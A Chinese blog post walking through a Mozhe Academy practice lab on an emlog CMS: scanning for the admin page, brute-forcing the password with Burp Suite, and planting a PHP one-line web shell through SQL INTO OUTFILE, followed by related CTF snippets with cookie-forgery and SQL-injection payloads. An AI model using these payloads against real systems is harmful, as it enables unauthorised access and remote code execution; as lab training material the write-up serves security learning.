墨者学院-CMS系统漏洞分析溯源(第6题)

最新推荐文章于 2024-02-06 20:39:57 发布
最新推荐文章于 2024-02-06 20:39:57 发布
阅读量320 收藏
点赞数
分类专栏: # 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/109090845
版权

CMS漏洞 暴力破解 一句话木马 数据库操作 网络安全
关键词由CSDN通过智能技术生成

CMS系统漏洞分析溯源(第6题)
一.解题思路
得到用户名之后爆破密码登录后台,再写入一句话木马
二.操作步骤
1.御剑扫描
在这里插入图片描述

可以看到后台登录界面为http://ip:port/servlets/

2.后台登录:
已知用户名为mozhe777
在这里插入图片描述

登录后台
在这里插入图片描述
使用Burpsuite抓包,进行暴力破解
设置类型为sniper
在这里插入图片描述

开始攻击
在这里插入图片描述

得到密码为qwer1234

3.成功登录后台,导出数据库,添加一句话
在这里插入图片描述
在这里插入图片描述

在导出的文件中添加以下字段

Drop TABLE IF EXISTS emlog_shell;
Create Table emlog_shell(`cmd` longtext NOT NULL);
Insert INTO emlog_shell VALUES('<?php @eval($_POST[pass]);?>');
Select cmd from emlog_shell into outfile '/var/www/html/pass.php';
Drop TABLE IF EXISTS emlog_shell;

在这里插入图片描述

4.使用蚁剑进行连接
配置参数
在这里插入图片描述

可以看到刚才新生成的pass.php文件
在这里插入图片描述

Key文件位于根目录下
在这里插入图片描述
网络信息安全—ploto

ploto_cs
关注
专栏目录
CMS系统漏洞分析溯源(第6)
weixin_50698958的博客
10-07 342
靶场: https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe 背景介绍 安全工程师"墨者"的朋友搭建一个emlog个人博客系统,为了确保该系统的安全性,请你检测该系统是否存在安全漏洞。 实训目标 1、了解验证码绕过的相关知识; 2、了解后台地址扫描及其他相关漏洞资料; 3、了解后台常用账户密码的利用方式; 解方向 进入后台,找到后台中可利用的地方getshell; 解思路: 1、使用
墨者学院 - CMS系统漏洞分析溯源(第5)
多崎巡礼的博客
10-29 1608
phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php &lt;?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?&gt;   判断如果没有admin_na...
墨者 - CMS系统漏洞分析溯源(第6)
吃肉唐僧的博客
07-22 480
打开环境,根据目提示 上网搜索emlog博客的后台地址,一般为/admin 但是访问失败,应该是改过路径了 用御剑扫描后台(坑点),只扫出以下地址 分别访问这些地址都没有后台的,后来看别人的解思路才发现 别人一扫就出来了(换了很多个版本,珍藏版,目录优化版,加强字典版.....均扫不出,一把泪) 这里参考https://blog.csdn.net/weixin_43884770...
墨者学院CMS系统漏洞分析溯源(第6)
weixin_43884770的博客
12-19 735
墨者学院-CMS系统漏洞分析溯源(第4)
JimWu的博客
09-04 821
CMS系统漏洞分析溯源(第4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
墨者学院-CMS系统漏洞分析溯源(第7)
JimWu的博客
09-04 976
CMS系统漏洞分析溯源(第7) 难易程度:★★ 目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫,然后打开burpsuite,访问/member/resetpassword.php,截包。 我们send to repeater,修改get的参数 ?...
墨者学院 - CMS系统漏洞分析溯源(第4)
多崎巡礼的博客
10-09 1050
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
墨者学院_CMS系统漏洞分析溯源(第9)
weixin_50698958的博客
09-23 622
漏洞概述: 在 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._
墨者学院-CMS系统漏洞分析溯源(第7)——亲妈级教程
ploto_cs的博客
09-30 1188
墨者学院-CMS系统漏洞分析溯源(第7)——亲妈级教程 方法一: 1.通过探测发现该靶场为DEDE-CMS 靶场为20180109 http://host:post/data/admin/ver.txt 为DEDE版本号位置 2.构造请求获取重置密码链接 请求1:http://219.153.49.228:47258/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1 重置密
墨者学院_BeesCMS系统漏洞分析溯源
cc_de_csdn的博客
08-22 976
墨者学院——BeesCMS系统漏洞分析溯源 1、打开用御剑扫描出admin/login.php登录界面 2、输入1’报错,存在注入 3、在user处构造代码直接写入shell,注意验证码是要最新的 4.菜刀连接得到KEY 大概是这么个流程,这样就得到KEY。 ...
BeesCMS系统漏洞分析溯源(墨者学院)
weixin_44300286的博客
05-13 1381
0x01、信息收集 拿到网站,先扫描目录,发现有后台登录界面 尝试登录,发现弱口令admin/admin成功进入后台 找到上传文件的地方准备文件上传 但是多次尝试都未能成功,就算普通图片也没法上传 0x02、sql注入 后来发现在登录界面有sql注入 经过尝试发现过滤了一些关键字 user=admin' uni union on seselectlect updatexml('1',concat('~',(seselectlect database())),'1')#&password=123
【Web】内部文件上传系统漏洞分析溯源(获取shell)
HAPPY
07-29 3541
【准备工具】 1.中国菜刀 (可以去官网下载) 官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/10570976 2.BurpPro 3.火狐浏览器的FoxyProxy Standard插件 【技术要点】 1.新建一句话代码,比如1.txt,内容选择如下 ...
墨者靶场 初级:BeesCMS系统漏洞分析溯源
qq_43233085的博客
01-16 2418
墨者靶场 初级:BeesCMS系统漏洞分析溯源目背景介绍实训目标解方向解步骤 目 背景介绍 某人搭建BeesCMS网站,邀请“墨者”安全工程师测试网站的安全性。 实训目标 1、了解BeesCMS; 2、了解此漏洞形成的原因; 3、掌握此漏洞的利用方式; 解方向 根据网站目录,找到利用漏洞。 提示:网站位于"/var/www/html/"目录下。 解步骤 启动靶机,访问链接,是个企业网...
墨者学院 - WebShell代码分析溯源(第6)
多崎巡礼的博客
08-03 443
审查代码,在图片文件夹中有php(有毒) 使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析, 类似于第五,用e来接受assert的base64加密的值作为函数,用POST作为密码 使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...
SQL注入讲解-BeesCMS系统漏洞分析溯源
最新发布
Ryongao
02-06 1587
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值